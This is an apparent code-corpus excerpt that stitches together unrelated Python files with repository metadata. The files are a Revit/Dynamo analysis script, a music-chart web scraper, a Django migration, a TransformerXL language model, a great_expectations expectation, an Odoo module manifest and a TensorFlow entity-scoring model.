return MarketStream(unique_id, self.output_queue)
elif stream_type == 'orderSubscription':
return OrderStream(unique_id, self.output_queue)
@staticmethod
def _error_handler(data, unique_id):
"""Called when data first received
:param data: Received data
:param unique_id: Unique id
:return: True if error present
"""
status_code = data.get('statusCode')
connection_closed = data.get('connectionClosed')
if status_code == 'FAILURE':
logging.error('[Subscription: %s] %s: %s' %
(unique_id, data.get('errorCode'), data.get('errorMessage')))
if connection_closed:
return True
def __str__(self):
return '<StreamListener>'
| [
"paulingliam@gmail.com"
] | paulingliam@gmail.com |
d361163583c2c32c54d91c8e8707524d150b297a | a110cda0dd755a0aeeccaa349de5b7c8f836f7d9 | /Dynamo_0.7.X/markerAndTextDisplayStyle.py | 390152422c99ba55f8f8ecbba14bd663d5c5819d | [] | no_license | ksobon/archi-lab | 26d93ef07e4f571e73a78bc40299edd3dc84c2a6 | 9a8a57eccca899ace78a998dc7698ff7754fae6b | refs/heads/master | 2021-01-15T09:37:06.045588 | 2020-06-03T15:55:46 | 2020-06-03T15:55:46 | 26,090,112 | 6 | 5 | null | 2020-02-09T04:24:41 | 2014-11-02T19:02:28 | Python | UTF-8 | Python | false | false | 4,562 | py | #Copyright(c) 2015, Konrad K Sobon
# @arch_laboratory, http://archi-lab.net
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
from System.Collections.Generic import *
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
from Autodesk.Revit.DB.Analysis import *
doc = DocumentManager.Instance.CurrentDBDocument
uiapp = DocumentManager.Instance.CurrentUIApplication
app = uiapp.Application
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
#The inputs to this node will be stored as a list in the IN variable.
dataEnteringNode = IN
points = IN[0]
values = IN[1]
colorSettings = IN[2]
legendSettings = IN[3]
markerSettings = IN[4]
displayStyleName = IN[5]
analysisResultName = IN[6]
analysisResultDescription = IN[7]
unitNames = IN[8]
unitMultipliers = IN[9]
displayUnit = IN[10]
message = ""
def dsPointToRvtPoint(dsPoint):
factor = 3.2808398950
x = dsPoint.X * factor
y = dsPoint.Y * factor
z = dsPoint.Z * factor
return Autodesk.Revit.DB.XYZ(x,y,z)
def chunks(data, n):
if n < 1:
n = 1
return [data[i:i + n] for i in range(0, len(data), n)]
#"Start" the transaction
TransactionManager.Instance.EnsureInTransaction(doc)
#create spatial field manager if one doesnt already exist
sfm = SpatialFieldManager.GetSpatialFieldManager(doc.ActiveView)
if sfm == None:
sfm = SpatialFieldManager.CreateSpatialFieldManager(doc.ActiveView, 1)
sfm.Clear()
#get result schema index if existing else crete one
regResults = sfm.GetRegisteredResults()
if len(regResults) != 0:
for i in regResults:
if sfm.GetResultSchema(i).Name == analysisResultName:
resultSchema = sfm.GetResultSchema(i)
else:
resultSchema = AnalysisResultSchema(analysisResultName, analysisResultDescription)
names = List[str]()
multipliers = List[float]()
for i,j in zip(unitMultipliers, unitNames):
multipliers.Add(i)
names.Add(j)
resultSchema.SetUnits(names, multipliers)
for i in range(0, resultSchema.GetNumberOfUnits(), 1):
if resultSchema.GetUnitsName(i) == displayUnit:
resultSchema.CurrentUnits = i
message = "Success! Remember that your current \ndisplay units are set to " + displayUnit
else:
continue
if resultSchema.GetUnitsName(resultSchema.CurrentUnits) != displayUnit:
message = "Display Units supplied not available. \nEither add those units to results or \nspecify one of the already supplied."
schemaIndex = sfm.RegisterResult(resultSchema)
#create spatial field primitives and assign values to points
points = chunks(points, 999)
values = chunks(values, 999)
for i, j in zip(points, values):
fieldPoints = List[Autodesk.Revit.DB.XYZ]()
for point in i:
fieldPoints.Add(dsPointToRvtPoint(point))
pnts = FieldDomainPointsByXYZ(fieldPoints)
fieldPoints.Clear()
valList = List[ValueAtPoint]()
doubleList = List[float]()
for value in j:
doubleList.Add(float(value))
valList.Add(ValueAtPoint(doubleList))
doubleList.Clear()
vals = FieldValues(valList)
valList.Clear()
idx = sfm.AddSpatialFieldPrimitive()
sfm.UpdateSpatialFieldPrimitive(idx, pnts, vals, schemaIndex)
#define analysis display style and set legend/color settings
collector = FilteredElementCollector(doc)
collection = collector.OfClass(AnalysisDisplayStyle).ToElements()
displayStyle = []
for i in collection:
if i.Name == displayStyleName and i.HasMarkersAndTextSettings():
displayStyle.append(i)
elif i.Name == displayStyleName and not i.HasMarkersAndTextSettings():
message = "Specified Display Style name already \nexists; please supply different name"
else:
continue
if len(displayStyle) == 0:
try:
analysisDisplayStyle = AnalysisDisplayStyle.CreateAnalysisDisplayStyle(doc, displayStyleName, markerSettings, colorSettings, legendSettings)
except:
pass
else:
analysisDisplayStyle = displayStyle[0]
analysisDisplayStyle.SetLegendSettings(legendSettings)
analysisDisplayStyle.SetColorSettings(colorSettings)
analysisDisplayStyle.SetMarkersAndTextSettings(markerSettings)
try:
doc.ActiveView.AnalysisDisplayStyleId = analysisDisplayStyle.Id
except:
pass
# "End" the transaction
TransactionManager.Instance.TransactionTaskDone()
#Assign your output to the OUT variable
if len(message) != 0:
OUT = '\n'.join('{:^35}'.format(s) for s in message.split('\n'))
else:
OUT = 0
| [
"ksobon1986@gmail.com"
] | ksobon1986@gmail.com |
941fad21374a597dfb5c097d482af2e93d687dab | 2951174fd6d8a7cf9a71e0663ae3b22bd309be5a | /yinyuetai.py | ef78c8285d10e9124070a491e1d831f446d99c16 | [] | no_license | WhiteBrownBottle/Python- | c76045a3127723666083cee4b4c20b08491e4067 | 92fcaba555a566eae829ea401a20f459b4f39dfe | refs/heads/master | 2021-07-18T21:17:45.677091 | 2017-10-24T06:47:38 | 2017-10-24T06:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,953 | py | import os
import requests
import bs4
import random
def get_html(url):
try:
r = requests.get(url, timeout = 30)
r.raise_for_status
r.encoding = r.apparent_encoding
return r.text
except:
return 'Something wrong!'
def get_agent():
'''
模拟header的user-agent字段,
返回一个随机的user-agent字典类型的键值对
:return:
'''
agents = ['Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)']
fakeheader = {}
fakeheader['User-agent'] = agents[random.randint(0, len(agents))]
return fakeheader
def get_proxy():
'''
简单模拟代理池
返回一个字典类型的键值对
:return:
'''
proxy = ["http://203.91.121.76:3128",
"http://123.7.38.31:9999",
"http://218.56.132.155:8080",
"http://220.249.185.178:9999",
"http://218.66.253.145:8800",
"http://110.73.15.81:80",
"http://61.163.39.70:9999",
"http://27.44.174.134:9999"]
fakepxs = {}
fakepxs['http'] = proxy[random.randint(0, len(proxy))]
return fakepxs
def get_content(url):
#我们来打印一下表头
if url[-2:] == 'ML':
print('内地排行榜')
elif url[-2:] == 'HT':
print('港台排行榜')
elif url[-2:] == 'US':
print('欧美排行榜')
elif url[-2:] == 'KR':
print('韩国排行榜')
else:
print('日本排行榜')
#找到我们需要的每一个标签
html = get_html(url)
soup = bs4.BeautifulSoup(html, 'lxml')
li_list = soup.find_all('li', attrs={'name' : 'dmvLi'})
for li in li_list:
match = {}
try:
# 判断分数的升降!
if li.find('h3', class_='desc_score'):
match['分数'] = li.find('h3', class_='desc_score').text
else:
match['分数'] = li.find('h3', class_='asc_score').text
match['排名'] = li.find('div', class_='top_num').text
match['名字'] = li.find('a', class_='mvname').text
match['发布时间'] = li.find('p', class_='c9').text
match['歌手'] = li.find('a', class_='special').text
except:
return ""
print(match)
def main():
base_url = "http://vchart.yinyuetai.com/vchart/trends?area="
suffix = ['ML','HT','US','JP','KR']
for suff in suffix:
url = base_url+suff
print()
get_content(url)
if __name__ == '__main__':
main() | [
"958255724@qq.com"
] | 958255724@qq.com |
c9ad0beaf717d4624106ae4450733c77f377bf54 | f97242dfbe3c629dcabb6226b59aaf808a5b1cec | /project/analysis/migrations/0002_auto_20151216_1041.py | ba6d0fa627953bddd0602f1598b1068dc1b19f8c | [] | no_license | shapiromatron/genomics | ab48cc2d7eab94e9777ffce0ee7d5865af7d7ae1 | 8cabcaf7a6a04cd84fdefca6a39c9fde5f3329c8 | refs/heads/master | 2021-01-21T04:50:24.186897 | 2016-06-10T19:52:24 | 2016-06-10T19:52:24 | 44,177,551 | 0 | 1 | null | 2016-06-10T19:44:42 | 2015-10-13T13:19:32 | Python | UTF-8 | Python | false | false | 2,020 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('analysis', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='analysis',
options={'verbose_name_plural': 'Analyses'},
),
migrations.AlterModelOptions(
name='analysisdatasets',
options={'verbose_name_plural': 'Analysis datasets'},
),
migrations.AlterModelOptions(
name='datasetcorrelationmatrix',
options={'verbose_name_plural': 'Dataset correlation matrices'},
),
migrations.AlterModelOptions(
name='featurelistcountmatrix',
options={'verbose_name_plural': 'Feature list count matrices'},
),
migrations.AlterField(
model_name='datasetcorrelationmatrix',
name='matrix',
field=models.FileField(max_length=256, upload_to=''),
),
migrations.AlterField(
model_name='featurelistcountmatrix',
name='matrix',
field=models.FileField(max_length=256, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='data_ambiguous',
field=models.FileField(max_length=256, blank=True, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='data_minus',
field=models.FileField(max_length=256, blank=True, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='data_plus',
field=models.FileField(max_length=256, blank=True, upload_to=''),
),
migrations.AlterField(
model_name='genomicdataset',
name='genome_assembly',
field=models.PositiveSmallIntegerField(choices=[(1, 'hg19'), (2, 'mm9')]),
),
]
| [
"shapiromatron@gmail.com"
] | shapiromatron@gmail.com |
a9e04e7b4337a71ea3c4145ef99e36b28fc0f349 | c560b501fd326cad710c079e781a02366a70ddcf | /neural_sp/models/lm/transformer_xl.py | 8eb12980fa36974eec76a97e2addf844cccb643c | [
"Apache-2.0"
] | permissive | houwenxin/neural_sp | b3f90176c462f242304c202e3534dfb98c95b225 | b34e6c067bd79092abe8ff5445d9a55c147bef51 | refs/heads/master | 2023-03-11T16:04:12.668442 | 2021-03-03T15:32:36 | 2021-03-03T15:32:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,493 | py | # Copyright 2020 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""TransformerXL language model."""
import copy
import logging
import math
import os
import random
import shutil
import torch
import torch.nn as nn
from neural_sp.models.lm.lm_base import LMBase
from neural_sp.models.modules.initialization import init_like_transformer_xl
from neural_sp.models.modules.positional_embedding import XLPositionalEmbedding
from neural_sp.models.modules.transformer import TransformerDecoderBlock
from neural_sp.models.torch_utils import tensor2np
from neural_sp.utils import mkdir_join
import matplotlib
matplotlib.use('Agg')
random.seed(1)
logger = logging.getLogger(__name__)
class TransformerXL(LMBase):
"""TransformerXL language model."""
def __init__(self, args, save_path=None):
super(LMBase, self).__init__()
logger.info(self.__class__.__name__)
self.lm_type = args.lm_type
self.save_path = save_path
self.d_model = args.transformer_d_model
self.n_layers = args.n_layers
self.n_heads = args.transformer_n_heads
self.lsm_prob = args.lsm_prob
if args.mem_len > 0:
self.mem_len = args.mem_len
else:
self.mem_len = args.bptt
if args.recog_mem_len > 0:
self.mem_len = args.recog_mem_len
self.vocab = args.vocab
self.eos = 2
self.pad = 3
# NOTE: reserved in advance
# for cache
self.cache_theta = 0.2 # smoothing parameter
self.cache_lambda = 0.2 # cache weight
self.cache_ids = []
self.cache_keys = []
self.cache_attn = []
self.embed_cache = None
# positional embedding
self.pos_emb = XLPositionalEmbedding(self.d_model, args.dropout_in)
self.u_bias = nn.Parameter(torch.Tensor(self.n_heads, self.d_model // self.n_heads))
self.v_bias = nn.Parameter(torch.Tensor(self.n_heads, self.d_model // self.n_heads))
# NOTE: u_bias and v_bias are global parameters
self.embed = nn.Embedding(self.vocab, self.d_model, padding_idx=self.pad)
self.scale = math.sqrt(self.d_model) # for token embedding
self.dropout_emb = nn.Dropout(p=args.dropout_in) # for token embedding
self.layers = nn.ModuleList([copy.deepcopy(TransformerDecoderBlock(
self.d_model, args.transformer_d_ff, 'scaled_dot',
self.n_heads, args.dropout_hidden, args.dropout_att, args.dropout_layer,
args.transformer_layer_norm_eps, args.transformer_ffn_activation, args.transformer_param_init,
src_tgt_attention=False, memory_transformer=True)) for lth in range(self.n_layers)])
self.norm_out = nn.LayerNorm(self.d_model, eps=args.transformer_layer_norm_eps)
self.adaptive_softmax = None
self.output = None
if args.adaptive_softmax:
self.adaptive_softmax = nn.AdaptiveLogSoftmaxWithLoss(
self.d_model, self.vocab,
cutoffs=[round(self.vocab / 15), 3 * round(self.vocab / 15)],
# cutoffs=[self.vocab // 25, 3 * self.vocab // 5],
div_value=4.0)
else:
self.output = nn.Linear(self.d_model, self.vocab)
if args.tie_embedding:
self.output.weight = self.embed.weight
self.reset_parameters()
@property
def output_dim(self):
return self.d_model
@staticmethod
def add_args(parser, args):
"""Add arguments."""
group = parser.add_argument_group("Transformer-XL LM")
group.add_argument('--transformer_d_model', type=int, default=256,
help='number of units in the MHA layer')
group.add_argument('--transformer_d_ff', type=int, default=2048,
help='number of units in the FFN layer')
# group.add_argument('--transformer_ffn_bottleneck_dim', type=int, default=0,
# help='bottleneck dimension in the FFN layer')
group.add_argument('--transformer_n_heads', type=int, default=4,
help='number of heads in the MHA layer')
group.add_argument('--transformer_layer_norm_eps', type=float, default=1e-12,
help='epsilon value for layer normalization')
group.add_argument('--transformer_ffn_activation', type=str, default='relu',
choices=['relu', 'gelu', 'gelu_accurate', 'glu', 'swish'],
help='nonlinear activation for the FFN layer')
group.add_argument('--transformer_param_init', type=str, default='xavier_uniform',
choices=['xavier_uniform', 'pytorch'],
help='parameter initialization')
group.add_argument('--dropout_att', type=float, default=0.1,
help='dropout probability for the attention weights')
group.add_argument('--dropout_layer', type=float, default=0.0,
help='LayerDrop probability for Transformer layers')
# XL specific
group.add_argument('--mem_len', type=int, default=0,
help='number of tokens for memory in TransformerXL during training')
return parser
@staticmethod
def define_name(dir_name, args):
dir_name = args.lm_type
dir_name += str(args.transformer_d_model) + 'dmodel'
dir_name += str(args.transformer_d_ff) + 'dff'
dir_name += str(args.n_layers) + 'L'
dir_name += str(args.transformer_n_heads) + 'H'
if args.tie_embedding:
dir_name += '_tie'
if args.adaptive_softmax:
dir_name += '_adaptiveSM'
if args.mem_len > 0:
dir_name += '_mem' + str(args.mem_len)
return dir_name
def reset_parameters(self):
"""Initialize parameters with normal distribution."""
logger.info('===== Initialize %s with normal distribution =====' % self.__class__.__name__)
for n, p in self.named_parameters():
init_like_transformer_xl(n, p, std=0.02)
def init_memory(self):
"""Initialize memory."""
return [torch.empty(0, dtype=torch.float).to(self.device)
for _ in range(self.n_layers)]
def update_memory(self, memory_prev, hidden_states):
"""Update memory.
Args:
memory_prev (List): length `n_layers` (inter-utterance),
each of which contains a FloatTensor of size `[B, mlen, d_model]`
hidden_states (List): length `n_layers` (intra-utterance),
each of which contains a FloatTensor of size `[B, L, d_model]`
Returns:
new_mems (List): length `n_layers`,
each of which contains a FloatTensor of size `[B, mlen, d_model]`
"""
if memory_prev is None:
memory_prev = self.init_memory() # 0-th to L-1-th layer
assert len(hidden_states) == len(memory_prev), (len(hidden_states), len(memory_prev))
mlen = memory_prev[0].size(1) if memory_prev[0].dim() > 1 else 0
qlen = hidden_states[0].size(1)
# There are `mlen + qlen` steps that can be cached into mems
# For the next step, the last `ext_len` of the `qlen` tokens
# will be used as the extended context. Hence, we only cache
# the tokens from `mlen + qlen - self.ext_len - self.mem_len`
# to `mlen + qlen - self.ext_len`.
with torch.no_grad():
new_mems = []
end_idx = mlen + qlen
start_idx = max(0, end_idx - self.mem_len)
for m, h in zip(memory_prev, hidden_states):
cat = torch.cat([m, h], dim=1) # `[B, mlen + qlen, d_model]`
new_mems.append(cat[:, start_idx:end_idx].detach()) # `[B, self.mem_len, d_model]`
return new_mems
def embed_token_id(self, indices):
"""Embed token IDs.
Args:
indices (LongTensor): `[B]`
Returns:
ys_emb (FloatTensor): `[B, vocab, emb_dim]`
"""
if self.embed_cache is None or self.training:
ys_emb = self.dropout_emb(self.embed(indices) * self.scale)
else:
ys_emb = self.embed_cache[indices]
return ys_emb
def decode(self, ys, state=None, mems=None, cache=None, incremental=False):
"""Decode function.
Args:
ys (LongTensor): `[B, L]`
state (List): dummy interfance for RNNLM
mems (List): length `n_layers` (inter-utterance),
each of which contains a FloatTensor of size `[B, mlen, d_model]`
cache (List): length `n_layers` (intra-utterance),
each of which contains a FloatTensor of size `[B, L-1, d_model]`
incremental (bool): ASR decoding mode
Returns:
logits (FloatTensor): `[B, L, vocab]`
out (FloatTensor): `[B, L, d_model]`
new_cache (List): length `n_layers`,
each of which contains a FloatTensor of size `[B, L, d_model]`
"""
# for ASR decoding
if cache is None:
cache = [None] * self.n_layers # 1-th to L-th layer
if mems is None:
mems = self.init_memory()
mlen = 0
else:
mlen = mems[0].size(1)
bs, ylen = ys.size()[:2]
if incremental and cache[0] is not None:
ylen = cache[0].size(1) + 1
# Create the self-attention mask
causal_mask = ys.new_ones(ylen, ylen + mlen).byte()
causal_mask = torch.tril(causal_mask, diagonal=mlen).unsqueeze(0)
causal_mask = causal_mask.repeat([bs, 1, 1]) # `[B, L, L+mlen]`
out = self.embed_token_id(ys)
rel_pos_embs = self.pos_emb(ys, mlen=mlen)
new_mems = [None] * self.n_layers
new_cache = [None] * self.n_layers
hidden_states = [out]
for lth, (mem, layer) in enumerate(zip(mems, self.layers)):
if incremental and mlen > 0 and mem.size(0) != bs:
mem = mem.repeat([bs, 1, 1])
out = layer(out, causal_mask, cache=cache[lth],
pos_embs=rel_pos_embs, memory=mem, u_bias=self.u_bias, v_bias=self.v_bias)
if incremental:
new_cache[lth] = out
elif lth < self.n_layers - 1:
hidden_states.append(out)
# NOTE: outputs from the last layer is not used for memory
if not self.training and layer.yy_aws is not None:
setattr(self, 'yy_aws_layer%d' % lth, tensor2np(layer.yy_aws))
out = self.norm_out(out)
if self.adaptive_softmax is None:
logits = self.output(out)
else:
logits = out
if incremental:
# NOTE: do not update memory here during ASR decoding
return logits, out, new_cache
else:
# Update memory
new_mems = self.update_memory(mems, hidden_states)
return logits, out, new_mems
def plot_attention(self, n_cols=4):
"""Plot attention for each head in all layers."""
from matplotlib import pyplot as plt
from matplotlib.ticker import MaxNLocator
save_path = mkdir_join(self.save_path, 'att_weights')
# Clean directory
if save_path is not None and os.path.isdir(save_path):
shutil.rmtree(save_path)
os.mkdir(save_path)
for lth in range(self.n_layers):
if not hasattr(self, 'yy_aws_layer%d' % lth):
continue
yy_aws = getattr(self, 'yy_aws_layer%d' % lth)
plt.clf()
fig, axes = plt.subplots(self.n_heads // n_cols, n_cols, figsize=(20, 8))
for h in range(self.n_heads):
if self.n_heads > n_cols:
ax = axes[h // n_cols, h % n_cols]
else:
ax = axes[h]
ax.imshow(yy_aws[-1, h, :, :], aspect="auto")
ax.grid(False)
ax.set_xlabel("Input (head%d)" % h)
ax.set_ylabel("Output (head%d)" % h)
ax.xaxis.set_major_locator(MaxNLocator(integer=True))
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
fig.tight_layout()
fig.savefig(os.path.join(save_path, 'layer%d.png' % (lth)))
plt.close()
| [
"hiro.mhbc@gmail.com"
] | hiro.mhbc@gmail.com |
21b9439764ab2bc2b66440c6d24e63f1b755f5c2 | 4d586ecc9febedb199376bc005eb783c55fae7b0 | /great_expectations/expectations/core/expect_column_values_to_match_like_pattern.py | c6a927e14227c06c8ace633c79c429646d7294f7 | [
"Apache-2.0"
] | permissive | spbail/great_expectations | 1db532763ad9c5c07aec251b64a61de3fb6f677f | c4fa245f77912dfdfd613c84fb75f631c0b73f03 | refs/heads/main | 2023-07-01T23:40:44.586052 | 2021-04-22T00:09:35 | 2021-04-22T00:09:35 | 360,619,476 | 2 | 0 | Apache-2.0 | 2021-04-22T17:20:19 | 2021-04-22T17:20:18 | null | UTF-8 | Python | false | false | 2,792 | py | from typing import Optional
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.expectations.util import render_evaluation_parameter_string
from ...render.renderer.renderer import renderer
from ...render.util import substitute_none_for_missing
from ..expectation import ColumnMapExpectation, InvalidExpectationConfigurationError
try:
import sqlalchemy as sa
except ImportError:
pass
class ExpectColumnValuesToMatchLikePattern(ColumnMapExpectation):
library_metadata = {
"maturity": "production",
"package": "great_expectations",
"tags": ["core expectation", "column map expectation"],
"contributors": [
"@great_expectations",
],
"requirements": [],
}
map_metric = "column_values.match_like_pattern"
success_keys = (
"mostly",
"like_pattern",
)
default_kwarg_values = {
"like_pattern": None,
"row_condition": None,
"condition_parser": None, # we expect this to be explicitly set whenever a row_condition is passed
"mostly": 1,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": True,
}
def validate_configuration(self, configuration: Optional[ExpectationConfiguration]):
super().validate_configuration(configuration)
try:
assert "like_pattern" in configuration.kwargs, "Must provide like_pattern"
assert isinstance(
configuration.kwargs.get("like_pattern"), (str, dict)
), "like_pattern must be a string"
if isinstance(configuration.kwargs.get("like_pattern"), dict):
assert "$PARAMETER" in configuration.kwargs.get(
"like_pattern"
), 'Evaluation Parameter dict for like_pattern kwarg must have "$PARAMETER" key.'
except AssertionError as e:
raise InvalidExpectationConfigurationError(str(e))
return True
@classmethod
@renderer(renderer_type="renderer.prescriptive")
@render_evaluation_parameter_string
def _prescriptive_renderer(
cls,
configuration=None,
result=None,
language=None,
runtime_configuration=None,
**kwargs
):
runtime_configuration = runtime_configuration or {}
include_column_name = runtime_configuration.get("include_column_name", True)
include_column_name = (
include_column_name if include_column_name is not None else True
)
styling = runtime_configuration.get("styling")
params = substitute_none_for_missing(
configuration.kwargs,
["column", "mostly", "row_condition", "condition_parser"],
)
| [
"noreply@github.com"
] | spbail.noreply@github.com |
5b2498d10e6e0f7de3e78241053183a155df9a95 | ce73929de648d080420fc99a86e7b73bfb15f0dc | /tms_maintenance/__openerp__.py | 67959bfef32db6801dfb3d8b4b7b99f04d6e8f0e | [] | no_license | thinkasoft/TMS | dce16ee4b10f9e35d392c883b443f556946d9526 | d8d07227749e07e047a03713142c0bb898a9abf6 | refs/heads/master | 2021-01-10T02:31:22.526633 | 2016-02-01T22:25:00 | 2016-02-01T22:25:00 | 50,875,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,922 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 HESATEC (<http://www.hesatecnica.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
"name" : "Fleet Maintenance Workshop Management",
"version" : "1.0",
"category" : "Vertical",
'complexity': "normal",
"author" : "HESATEC",
"website": "http://www.hesatecnica.com",
"depends" : ["tms","stock_move_entries"],
"description": """
Fleet Maintenance Workshop Management
=========================================
This application allows you to manage an Fleet Maintenance Workshop, very useful when Compnay has its own Maintenance Workshop.
It handles full Maintenance Workflow:
Opening Maintenance Order => Warehouse Integration => Closing Maintenance Order
Also, you can manage:
- Several Workshops
- Preventive Maintenance Cycles
- Corrective Maintenance
- Warehouse Integration for spare parts
Takes from Freight Management Module:
- Vehicles
- Trucks Red Tapes
- Truck Odometers
""",
"data" : [
'security/tms_security.xml',
'security/ir.model.access.csv',
'product_view.xml',
'tms_maintenance_view.xml',
'tms_maintenance_order_view.xml',
'tms_maintenance_order_activity_view.xml',
'tms_product_line_view.xml',
'sale_view.xml',
'tms_activity_control_time_view.xml',
'tms_time_view.xml',
'tms_analisys_01_view.xml',
'tms_analisys_02_view.xml',
'tms_analisys_03_view.xml',
'tms_analisys_04_view.xml',
#'tms_analisys_05_view.xml',
#'activities_to_invoice_view.xml',
#'create_invoice_view.xml',
'stock_view.xml',
'tms_maintenance_driver_report_view.xml',
'ir_config_parameter.xml'
],
"active": False,
'application': True,
"installable": True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"you@example.com"
] | you@example.com |
2777fc95d9b7160b0a91a6bd8f318fee534d933e | 8bccc05fcb3cfc6ed93991927a514a96f53f7ec0 | /old_version/candidate_selection/tensorflow_models/baselines/entity_embedding_vs_gold.py | bf4932a2a4dc0e677e69a935306211c2a78dac5a | [
"MIT"
] | permissive | afcarl/QuestionAnsweringGCN | 54101c38549405d65ef22e38fed9e5bd58122ada | e9c1987b40a553f0619fa796f692c8880de32846 | refs/heads/master | 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,137 | py | import tensorflow as tf
from candidate_selection.tensorflow_hypergraph_representation import TensorflowHypergraphRepresentation
from candidate_selection.tensorflow_models.abstract_tensorflow_model import AbstractTensorflowModel
from candidate_selection.tensorflow_models.components.decoders.softmax_decoder import SoftmaxDecoder
from candidate_selection.tensorflow_models.components.embeddings.sequence_embedding import SequenceEmbedding
from candidate_selection.tensorflow_models.components.embeddings.static_vector_embedding import StaticVectorEmbedding
from candidate_selection.tensorflow_models.components.embeddings.vector_embedding import VectorEmbedding
from candidate_selection.tensorflow_models.components.extras.embedding_retriever import EmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.mean_gold_embedding_retriever import \
MeanGoldEmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.target_comparator import TargetComparator
from candidate_selection.tensorflow_models.components.vector_encoders.multilayer_perceptron import MultilayerPerceptron
from candidate_selection.tensorflow_sentence_representation import TensorflowSentenceRepresentation
class EntityEmbeddingVsGold(AbstractTensorflowModel):
def get_preprocessor_stack_types(self):
preprocessor_stack_types = ["hypergraph", "gold", "sentence"]
if self.model_settings["static_entity_embeddings"]:
preprocessor_stack_types += ["static_entity_embeddings"]
return preprocessor_stack_types
def initialize_graph(self):
if not self.model_settings["static_entity_embeddings"]:
self.entity_embedding = VectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
self.add_component(self.entity_embedding)
else:
self.entity_embedding = StaticVectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
self.add_component(self.entity_embedding)
self.hypergraph = TensorflowHypergraphRepresentation(self.variables)
self.add_component(self.hypergraph)
self.mean_gold_embedding_retriever = MeanGoldEmbeddingRetriever(self.variables, variable_prefix="gold_lookup")
self.add_component(self.mean_gold_embedding_retriever)
#self.question_sentence = TensorflowSentenceRepresentation(self.variables)
#self.add_component(self.question_sentence)
#self.word_embedding = SequenceEmbedding(self.word_indexer, self.variables, variable_prefix="word")
#self.add_component(self.word_embedding)
self.target_comparator = TargetComparator(self.variables, variable_prefix="comparison_to_sentence", comparison="concat")
self.add_component(self.target_comparator)
self.decoder = SoftmaxDecoder(self.variables)
self.add_component(self.decoder)
self.sentence_to_graph_mapper = EmbeddingRetriever(self.variables, duplicate_policy="sum", variable_prefix="mapper")
self.add_component(self.sentence_to_graph_mapper)
self.transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
self.model_settings["entity_embedding_dimension"]],
self.variables,
variable_prefix="transformation",
l2_scale=self.model_settings["regularization_scale"])
self.add_component(self.transformation)
self.vertex_transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
self.model_settings["entity_embedding_dimension"]],
self.variables,
variable_prefix="transformation",
l2_scale=self.model_settings["regularization_scale"])
self.add_component(self.vertex_transformation)
self.final_transformation = MultilayerPerceptron([2*self.model_settings["entity_embedding_dimension"],
4 * self.model_settings["entity_embedding_dimension"],
1],
self.variables,
variable_prefix="transformation",
l2_scale=self.model_settings["regularization_scale"])
self.add_component(self.final_transformation)
def set_indexers(self, indexers):
self.entity_indexer = indexers.entity_indexer
def compute_entity_scores(self):
self.hypergraph.entity_vertex_embeddings = self.entity_embedding.get_representations()
self.hypergraph.entity_vertex_embeddings = tf.Print(self.hypergraph.entity_vertex_embeddings, [self.hypergraph.entity_vertex_embeddings], message="embeddings", summarize=100)
gold_embeddings = self.mean_gold_embedding_retriever.get_representations(self.hypergraph.entity_vertex_embeddings)
#gold_embeddings = tf.Print(gold_embeddings, [gold_embeddings], message="Gold: ", summarize=5)
#gold_embeddings = self.transformation.transform(gold_embeddings)
vertex_embeddings = self.hypergraph.entity_vertex_embeddings #self.vertex_transformation.transform(self.hypergraph.entity_vertex_embeddings)
#gold_embeddings = tf.Print(gold_embeddings, [self.hypergraph.entity_vertex_embeddings], message="Vertices: ", summarize=100)
hidden = self.target_comparator.get_comparison_scores(gold_embeddings, vertex_embeddings)
entity_scores = tf.squeeze(self.final_transformation.transform(hidden))
entity_scores = tf.Print(entity_scores, [entity_scores], summarize=25, message="entity_scores: ")
